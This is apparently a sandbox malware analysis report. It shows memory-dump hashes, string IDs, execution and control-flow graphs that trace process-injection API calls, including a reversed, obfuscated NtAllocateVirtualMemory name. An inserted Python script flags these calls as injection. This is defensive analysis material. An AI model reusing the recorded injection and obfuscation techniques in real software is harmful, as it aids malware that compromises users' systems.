                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: fbq$4']q$4']q$84Kk$84Kk$`Q]q$`Q]q$`Q]q$`Q]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$rMk$rMk
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-557165794
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b7184ee53c3566bed83232a7400b14aaef64c1aa08330693165284c92f3a5ba7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 39d871c97dc803259c445ce508385b7b23ed749e048f222461e58919480f0f55
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7184ee53c3566bed83232a7400b14aaef64c1aa08330693165284c92f3a5ba7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B0223B070524ECFCF158F68E454AAA7BF6AF85305F1484BAE9018B291CB35DDC5CBA1
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $c@j$4']q$4']q$84Kk$84Kk$tP]q$tP]q$JNk$JNk$JNk$JNk$JNk
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3537711116
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7893772f6c418929dbd5008e557304dad6f517251be686cd4cd2d39f067d6375
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fa6e77c53092b515905f29884fbe7ca86a6d1a3d9f78612f9b0d6190edb475ee
• Opcode Fuzzy Hash: 7893772f6c418929dbd5008e557304dad6f517251be686cd4cd2d39f067d6375
• Instruction Fuzzy Hash: F0512BB1B152068FCB344B69A414A67FBEAAFC1358F1484BBD6158B255CB35DCC2C3B1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
Similarity
• API ID:
• String ID: fbq$84Kk$`Q]q$`Q]q$tP]q$$]q$$]q$$]q$$]q$$]q
• API String ID: 0-2051191206
• Opcode ID: e3bc9a0d3371d311d82cbcb5cdc70c3390fa1d125614a5d9cc940e1cab17d168
• Instruction ID: 32427763339c79c0bff05a0384985f0acdad9b5e1e2388491e89c89bae94988f
• Opcode Fuzzy Hash: e3bc9a0d3371d311d82cbcb5cdc70c3390fa1d125614a5d9cc940e1cab17d168
• Instruction Fuzzy Hash: 9261BEB0A1620EDFDF24CF48E544BAA77F2BB45349F1990A5E8019B291C735DDC0CBA5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q$$]q$$]q$$]q$Ck$Ck
• API String ID: 0-3556525554
• Opcode ID: d1af0ff8b5e96af341ad55b4fbb3351a970242e2f6e9e24d150ac782693586dd
• Instruction ID: e7375fedf14a9baefa816059698be729a71cafc108d1a180a0452d30aaea9f61
• Opcode Fuzzy Hash: d1af0ff8b5e96af341ad55b4fbb3351a970242e2f6e9e24d150ac782693586dd
• Instruction Fuzzy Hash: 7851AAB17063469FCB245B29A8147A7FBB6BFC6250F24807BD485EB281DB35C885C7A1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
Similarity
• API ID:
• String ID: tMMk$`^q$`^q$`^q$`^q
• API String ID: 0-3832440206
• Opcode ID: 1ceb9b506e532d96e609d4214b1435c23f2d0365577e855e02b9a6dc7a8c72f1
• Instruction ID: 9b4ef9dc2d90734f084d429e1a13c2d3059f77228c1075731f1c14b13c50fd78
• Opcode Fuzzy Hash: 1ceb9b506e532d96e609d4214b1435c23f2d0365577e855e02b9a6dc7a8c72f1
• Instruction Fuzzy Hash: 24B1C574E002099FDB54DFA9D990A9DFBF6FF88300F24862AD419AB315DB34A905CF90
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
Similarity
• API ID:
• String ID: tMMk$`^q$`^q$`^q$`^q
• API String ID: 0-3832440206
• Opcode ID: c347ddb5e87a7e208fd27ab5085c8e7490eb65423e007bcff63f29a3191ca029
• Instruction ID: 16e3df4c0ee148283d131d9913fa3912995608994d063f86e10764c44b4345c2
• Opcode Fuzzy Hash: c347ddb5e87a7e208fd27ab5085c8e7490eb65423e007bcff63f29a3191ca029
• Instruction Fuzzy Hash: DDB1A574E002099FDB54DFA9D990A9DFBF6FF88304F248629D819AB315DB34A905CF90
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
Similarity
• API ID:
• String ID: fbq$4']q$4']q$rMk$rMk
• API String ID: 0-1225260034
• Opcode ID: 5930e81942d3154edd75dd11836e3dbd7d3d71c0e1911227d8dcf8604e1f4ed2
• Instruction ID: 2e779700d512065726eb97907bfcb5325aa52c8fe94863de953ba4aec3cedb92
• Opcode Fuzzy Hash: 5930e81942d3154edd75dd11836e3dbd7d3d71c0e1911227d8dcf8604e1f4ed2
• Instruction Fuzzy Hash: 34413771B053568FC7299B3CA8105A9BBA1EFC6224F1480BBD645CB291D7308D85C7D1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$84Kk$tP]q$JNk$JNk
• API String ID: 0-402265758
• Opcode ID: e782a2a4ac414b146bf9688a9f56702c9f314a47a91695a45d5292d0afe74756
• Instruction ID: c4341cc3581528a8ac0268480c13b8c46fd3db2c9b919d565eccdf5ed5d1c9cf
• Opcode Fuzzy Hash: e782a2a4ac414b146bf9688a9f56702c9f314a47a91695a45d5292d0afe74756
• Instruction Fuzzy Hash: FA210FB0A0220ADFCF348E45E584B76F7E6BF80758F1890AAEB041B251C332D9D2C761
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
Similarity
• API ID:
• String ID: `^q$`^q$`^q$`^q
• API String ID: 0-4294711580
• Opcode ID: 4c12f0de37d0251d402adfeccf522b921eda18686fb42bf2caab3fc05d0c4d9d
• Instruction ID: 48d4b34dcb7c781c8e46594176021f6169d7b9cd785487429c7854330b4ec3c7
• Opcode Fuzzy Hash: 4c12f0de37d0251d402adfeccf522b921eda18686fb42bf2caab3fc05d0c4d9d
• Instruction Fuzzy Hash: D9817374E012199FDB54DFA9D990A9DFBF6FF48300F24822AD819AB315E730A945CF90
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ,SMk$,SMk$p5=j$RMk
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-842928944
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: baf5a44496d3d46a6231923affad8506e691babe769410f039ba0710d7dccdbc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 836c0cf7ac0dc2e3a496d64da64f487b918ccbdebe8dd67e7def0de042beb61f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: baf5a44496d3d46a6231923affad8506e691babe769410f039ba0710d7dccdbc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 774139B1B053059FCB219B6CA810BEABFE6DF86314F14807BD559EB381DA35D880C7A1
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-858218434
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 06a251cdeceb00bc2d435fbbdbe18bb68fe603d7a57a374cfbcd602c1b13f3bd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 54b772281cfb2c4a2c90ad89ddeab7f0515da128506b70c4c985ddef956617d1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06a251cdeceb00bc2d435fbbdbe18bb68fe603d7a57a374cfbcd602c1b13f3bd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB216BB23013069BDB34596EAC54B77BBD6ABC5715F24843AEA05CF281DD35C850C361
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: 4']q$4']q$$]q$$]q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-978391646
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a299070ecd1a26676ee4574714f3a4df3bc7d26754cfa01c92b717ebc1fb2935
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ba741e0e06cd8d3a99082c3fb33af15bb6868eedfefb467154bc6a18bd704ba7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a299070ecd1a26676ee4574714f3a4df3bc7d26754cfa01c92b717ebc1fb2935
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEF05C75B1151A9BC73C211C35701B96AD7AFC0E5473549BBC9919B344CD254C4243DB
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $]q$$]q$JNk$JNk
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1526425236
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 64da0531ba1482471fd8e4625dbe032d2759bd82e2cbbd6b7a1dde2820a40123
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b93ea17daafbec40e4c117ae90f3a10624ba75c2e1ef9e4ed659a61f90d36aec
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64da0531ba1482471fd8e4625dbe032d2759bd82e2cbbd6b7a1dde2820a40123
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDF0E9B17512014BD938054D7C1095B93EFBBD0A94B14552BEB515B318CD358886C3A5

Execution Graph

Execution Coverage: 8.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 1346
Total number of Limit Nodes: 12
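The execution_graph dump that follows is one flat token stream: each node is a decimal node id followed by a hex code address and an optional label (either a summary such as `4 API calls` or the names of the APIs the function reaches), and every `src->dst` token is an edge. The Python script below is an added example, not part of the Joe Sandbox report, that parses that stream into nodes and edges, unions the API names seen at each code address, counts the distinct call sites that reach an address, and flags addresses whose labels combine NtWriteVirtualMemory with FlushInstructionCache, the pair used to write code into a process and then invalidate the target's instruction cache so the new bytes execute. The node-boundary heuristic (a decimal token immediately followed by a 6 to 8 character hex address) and the helper names are my own assumptions; `SAMPLE` is a constructed excerpt of the graph text on this page.

```python
import re
from collections import defaultdict

# Constructed excerpt of the execution_graph token stream on this page.
SAMPLE = (
    "execution_graph 28286 2d0c350 28289 2cff7c8 28286->28289 28288 2d0c358 "
    "28290 2cff7d0 28289->28290 28290->28290 29414 2cf88b8 28290->29414 "
    "28292 2cff7f1 28293 2cff7f6 28292->28293 "
    "28300 2cf89d0 4 API calls 28299->28300 "
    "28517 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress "
    "FlushInstructionCache 28514->28517 28518 2d00e5c 28517->28518"
)

# Assumed token shapes: node ids are decimal, code addresses are 6-8 hex chars.
NODE_ID = re.compile(r"\d+")
HEX_ADDR = re.compile(r"[0-9a-f]{6,8}")
EDGE = re.compile(r"(\d+)->(\d+)")
SUMMARY = re.compile(r"\d+ API calls?")


def parse_execution_graph(text):
    """Turn the flat token stream into ({node_id: {addr, label}}, [(src, dst), ...]).

    A node starts wherever a decimal token is immediately followed by a hex
    address; any other non-edge token is label text for the most recent node.
    """
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges = {}, []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.fullmatch(tok)
        if edge:
            edges.append((edge.group(1), edge.group(2)))
            i += 1
            continue
        if (NODE_ID.fullmatch(tok) and i + 1 < len(tokens)
                and HEX_ADDR.fullmatch(tokens[i + 1])):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "label": []}
            i += 2
            continue
        if current is not None:  # label text ("4 API calls", API names) for the current node
            nodes[current]["label"].append(tok)
        i += 1
    for node in nodes.values():
        node["label"] = " ".join(node["label"])
    return nodes, edges


def apis_by_address(nodes):
    """Union the API names seen at each code address; 'N API calls' summaries carry no names."""
    by_addr = defaultdict(set)
    for node in nodes.values():
        label = node["label"]
        if label and not SUMMARY.fullmatch(label):
            by_addr[node["addr"]].update(label.split())
    return by_addr


def callers_of(nodes, edges, addr):
    """Node ids with an edge into any node located at addr, i.e. distinct call sites."""
    targets = {nid for nid, node in nodes.items() if node["addr"] == addr}
    return {src for src, dst in edges if dst in targets}


def writes_remote_code(apis):
    """Write into a process's memory and then invalidate its instruction cache:
    the basic step of placing code in a (usually foreign) process before running it."""
    return {"NtWriteVirtualMemory", "FlushInstructionCache"} <= set(apis)


if __name__ == "__main__":
    graph_nodes, graph_edges = parse_execution_graph(SAMPLE)
    for addr, apis in sorted(apis_by_address(graph_nodes).items()):
        sites = callers_of(graph_nodes, graph_edges, addr)
        flag = "WRITES-REMOTE-CODE" if writes_remote_code(apis) else ""
        print(f"{addr}: {len(sites)} call site(s) {sorted(apis)} {flag}")
```

Run against the full graph text rather than the excerpt, the script resolves every `4 API calls` node at 2cf89d0 to the same four-API helper and reports it reached from dozens of distinct call sites, each one a NtWriteVirtualMemory followed by FlushInstructionCache. That call density, rather than any single API name, is the feature to pivot on when triaging this kind of dump.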
                                                                                                                                                                                                                                                                                                                                  execution_graph 28286 2d0c350 28289 2cff7c8 28286->28289 28288 2d0c358 28290 2cff7d0 28289->28290 28290->28290 29414 2cf88b8 28290->29414 28292 2cff7f1 28293 2cff7f6 28292->28293 28294 2cff850 28293->28294 28295 2cff87b 28294->28295 29420 2cf89d0 28295->29420 28297 2cff88e 28298 2cff8b4 28297->28298 28299 2cff8df 28298->28299 28300 2cf89d0 4 API calls 28299->28300 28301 2cff8f2 28300->28301 28302 2cff918 28301->28302 28303 2cff922 28302->28303 28304 2cf89d0 4 API calls 28303->28304 28305 2cff956 28304->28305 28306 2cff986 28305->28306 28307 2cf89d0 4 API calls 28306->28307 28308 2cff9ba 28307->28308 28309 2cff9ea 28308->28309 28310 2cf89d0 4 API calls 28309->28310 28311 2cffa1e 28310->28311 28312 2cffa3c 28311->28312 28313 2cffa4e 28312->28313 28314 2cf89d0 4 API calls 28313->28314 28315 2cffa82 28314->28315 28316 2cffaa0 28315->28316 28317 2cffad3 28316->28317 28318 2cf89d0 4 API calls 28317->28318 28319 2cffae6 28318->28319 28320 2cffaf3 28319->28320 28321 2d0b2f8 28319->28321 29430 2cff744 28320->29430 28323 2cffaf8 28323->28321 28324 2cffb1e 28323->28324 28325 2cf89d0 4 API calls 28324->28325 28326 2cffb27 28325->28326 28327 2cf89d0 4 API calls 28326->28327 28328 2cffb4e 28327->28328 28329 2cf89d0 4 API calls 28328->28329 28330 2cffb81 28329->28330 28331 2cffbd9 28330->28331 28332 2cffbf1 28331->28332 28333 2cf89d0 4 API calls 28332->28333 28334 2cffbfd 28333->28334 28335 2cf89d0 4 API calls 28334->28335 28336 2cffc30 28335->28336 28337 2cffc40 28336->28337 28338 2cf89d0 4 API calls 28337->28338 28339 2cffc63 28338->28339 28340 2cf89d0 4 API calls 28339->28340 28341 2cffc96 28340->28341 28342 2cffcf9 28341->28342 28343 2cffd06 28342->28343 28344 
2cf89d0 4 API calls 28343->28344 28345 2cffd12 28344->28345 28346 2cffd75 28345->28346 28347 2cf89d0 4 API calls 28346->28347 28348 2cffd8e 28347->28348 28349 2cf89d0 4 API calls 28348->28349 28350 2cffdc1 28349->28350 28351 2cf89d0 4 API calls 28350->28351 28352 2cffdf4 28351->28352 28353 2cf89d0 4 API calls 28352->28353 28354 2cffe27 28353->28354 28355 2cffe48 28354->28355 28356 2cffe7f 28355->28356 28357 2cf89d0 4 API calls 28356->28357 28358 2cffea3 28357->28358 28359 2cffeb3 28358->28359 28360 2cf89d0 4 API calls 28359->28360 28361 2cffed6 28360->28361 28362 2cf89d0 4 API calls 28361->28362 28363 2cfff09 28362->28363 28364 2cfff30 28363->28364 28365 2cf89d0 4 API calls 28364->28365 28366 2cfff3c 28365->28366 28367 2cfff94 28366->28367 28368 2cf89d0 4 API calls 28367->28368 28369 2cfffb8 28368->28369 28370 2cfffe4 28369->28370 28371 2cf89d0 4 API calls 28370->28371 28372 2d00034 28371->28372 28373 2d0005b 28372->28373 28374 2cf89d0 4 API calls 28373->28374 28375 2d00067 28374->28375 28376 2cf89d0 4 API calls 28375->28376 28377 2d0009a 28376->28377 28378 2cf89d0 4 API calls 28377->28378 28379 2d000cd 28378->28379 28380 2cf89d0 4 API calls 28379->28380 28381 2d00149 28380->28381 28382 2cf89d0 4 API calls 28381->28382 28383 2d001c5 28382->28383 28384 2cf89d0 4 API calls 28383->28384 28385 2d00241 28384->28385 28386 2cf89d0 4 API calls 28385->28386 28387 2d002bd 28386->28387 28388 2d002cc 28387->28388 28389 2d00327 28388->28389 28390 2d0033f 28389->28390 28391 2cf89d0 4 API calls 28390->28391 28392 2d00382 28391->28392 28393 2d003a3 28392->28393 28394 2d003bb 28393->28394 28395 2cf89d0 4 API calls 28394->28395 28396 2d003fe 28395->28396 28397 2d00414 28396->28397 28398 2d00534 28397->28398 28399 2d00427 28397->28399 28401 2d00555 28398->28401 28400 2d00448 28399->28400 28403 2cf89d0 4 API calls 28400->28403 28402 2cf89d0 4 API calls 28401->28402 28405 2d005b0 28402->28405 28404 2d004a3 28403->28404 28406 2d004c4 28404->28406 28407 2d005d1 28405->28407 28409 2cf89d0 
4 API calls 28406->28409 28408 2cf89d0 4 API calls 28407->28408 28410 2d0051f 28408->28410 28409->28410 28411 2d0052f 28410->28411 28412 2d0066d 28411->28412 28413 2cf89d0 4 API calls 28412->28413 28414 2d006c8 28413->28414 28415 2d006e9 28414->28415 28416 2cf89d0 4 API calls 28415->28416 28417 2d00744 28416->28417 28418 2d00751 28417->28418 28419 2d00794 28418->28419 28420 2d007ec 28419->28420 28421 2d00804 28420->28421 28422 2cf89d0 4 API calls 28421->28422 28423 2d00810 28422->28423 28424 2d00880 28423->28424 28425 2cf89d0 4 API calls 28424->28425 28426 2d0088c 28425->28426 28427 2d008fc 28426->28427 28428 2cf89d0 4 API calls 28427->28428 28429 2d00908 28428->28429 28430 2d00978 28429->28430 28431 2cf89d0 4 API calls 28430->28431 28432 2d00984 28431->28432 28433 2d009c5 28432->28433 28434 2d009fc 28433->28434 28435 2d00a07 28434->28435 28436 2cf89d0 4 API calls 28435->28436 28437 2d00a20 28436->28437 28438 2d00a41 28437->28438 28439 2d00a4c 28438->28439 28440 2d00a78 28439->28440 28441 2d00a83 28440->28441 28442 2cf89d0 4 API calls 28441->28442 28443 2d00a9c 28442->28443 28444 2d00abd 28443->28444 28445 2d00ac8 28444->28445 28446 2d00aff 28445->28446 28447 2cf89d0 4 API calls 28446->28447 28448 2d00b18 28447->28448 28449 2d00b22 28448->28449 28450 2d00b2f 28449->28450 28451 2d00b42 28450->28451 28452 2d012fe 28450->28452 28454 2d00b63 28451->28454 28453 2d0132a 28452->28453 28455 2d01337 28453->28455 28457 2d00b9a 28454->28457 28456 2d01356 28455->28456 28458 2d0136e 28456->28458 28459 2d00bb2 28457->28459 28460 2cf89d0 4 API calls 28458->28460 28461 2cf89d0 4 API calls 28459->28461 28463 2d0137a 28460->28463 28462 2d00bbe 28461->28462 28466 2d00bdf 28462->28466 28464 2d013a6 28463->28464 28465 2d013b3 28464->28465 28467 2d013d2 28465->28467 28468 2d00c16 28466->28468 28469 2d013ea 28467->28469 28470 2d00c2e 28468->28470 28471 2cf89d0 4 API calls 28469->28471 28472 2cf89d0 4 API calls 28470->28472 28475 2d013f6 28471->28475 28473 2d00c3a 28472->28473 28474 
2d00c5b 28473->28474 28476 2d00c66 28474->28476 28477 2d0142f 28475->28477 28479 2d00c92 28476->28479 28478 2d0144e 28477->28478 28480 2d01466 28478->28480 28482 2cf89d0 4 API calls 28479->28482 28481 2cf89d0 4 API calls 28480->28481 28483 2d01472 28481->28483 28484 2d00cb6 28482->28484 28486 2d01494 28483->28486 28485 2d00cd8 28484->28485 28487 2d00d09 28485->28487 28489 2d014d0 28486->28489 28488 2d00d14 28487->28488 28492 2d00d40 28488->28492 28490 2d014fc 28489->28490 28491 2d01507 28490->28491 28494 2d01514 28491->28494 28493 2d00d58 28492->28493 28496 2cf89d0 4 API calls 28493->28496 28495 2cf89d0 4 API calls 28494->28495 28498 2d01520 28495->28498 28497 2d00d64 28496->28497 28499 2d00d85 28497->28499 28500 2d0154c 28498->28500 28503 2d00d90 28499->28503 28501 2d01578 28500->28501 28502 2d01583 28501->28502 28505 2d01590 28502->28505 28504 2d00dd4 28503->28504 28507 2cf89d0 4 API calls 28504->28507 28506 2cf89d0 4 API calls 28505->28506 28508 2d0159c 28506->28508 28509 2d00de0 28507->28509 28511 2d015c8 28508->28511 29434 2ce4860 28509->29434 28515 2d015ff 28511->28515 28512 2d00e01 28513 2d00e43 28512->28513 28514 2d00e50 28513->28514 28517 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28514->28517 28516 2cf89d0 4 API calls 28515->28516 28520 2d01618 28516->28520 28518 2d00e5c 28517->28518 28519 2d00e71 28518->28519 28523 2d00e84 28519->28523 28521 2d01640 28520->28521 28522 2d01661 28521->28522 28524 2d01679 28522->28524 28525 2d00ebd 28523->28525 28528 2d016a3 28524->28528 28526 2d00ee7 28525->28526 28527 2d00ef4 28526->28527 28530 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28527->28530 28529 2cf89d0 4 API calls 28528->28529 28531 2d016bc 28529->28531 28532 2d00f00 28530->28532 28533 2d016dd 28531->28533 28534 2d00f39 28532->28534 28537 2d0171f 28533->28537 28535 2d00f63 28534->28535 28536 2d00f70 28535->28536 28539 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 

Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 12890 2cf7ac9 12891 2cf7a56 12890->12891 12892 2cf7a2e-2cf7a54 call 2ce4530 12891->12892 12893 2cf7a58-2cf7ac2 call 2cf798c call 2ce47ec call 2ce49a0 call 2cf81cc call 2cf8274 NtAllocateVirtualMemory call 2ce4500 12891->12893 12892->12891
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CF7A9F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2167126740-445027087
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 61ab34d3b642c09d6735b546244bf27655dad8982adf070d6f80b55633639234
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1bdf89e633d9063b2e892f63083cc48d7d225c8f962ec92eea6c3525a15b9d03
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61ab34d3b642c09d6735b546244bf27655dad8982adf070d6f80b55633639234
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D116D75680308BFEB94EFA4DC45FAEB7AEEB48700F415464FA05D7600D630AE08DB24

Control-flow Graph
• Legend: Executed / Not Executed
• 2cf7a2a-2cf7a47 → 2cf7a51-2cf7a56
• 2cf7a2a-2cf7a47 → 2cf7a4c (call 2ce4530) → 2cf7a51-2cf7a56
• 2cf7a51-2cf7a56 → 2cf7a2e-2cf7a4c (call 2ce4530) → back to 2cf7a51-2cf7a56
• 2cf7a51-2cf7a56 → 2cf7a58-2cf7ac2 (calls 2cf798c, 2ce47ec, 2ce49a0, 2cf81cc, 2cf8274, NtAllocateVirtualMemory, 2ce4500)
APIs
  • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
  • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CF7A9F
Strings
Memory Dump Source
• Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 421316089-445027087
• Opcode ID: 0215fbc86a319ee40c9455cba9f9b73ffcfc641069feacd49dede573bc387960
• Instruction ID: 522154eb7002021d6ca6064316f4891bf1ba3852fcf6d1c52d11761d8e2fe35a
• Opcode Fuzzy Hash: 0215fbc86a319ee40c9455cba9f9b73ffcfc641069feacd49dede573bc387960
• Instruction Fuzzy Hash: 81116975680308BFEB94EFA4EC41EAEB7AEEB48B00F414460FA01D7200D630EE04DB60

Control-flow Graph
• Legend: Executed / Not Executed
• 2cf7a2c-2cf7a47 → 2cf7a51-2cf7a56
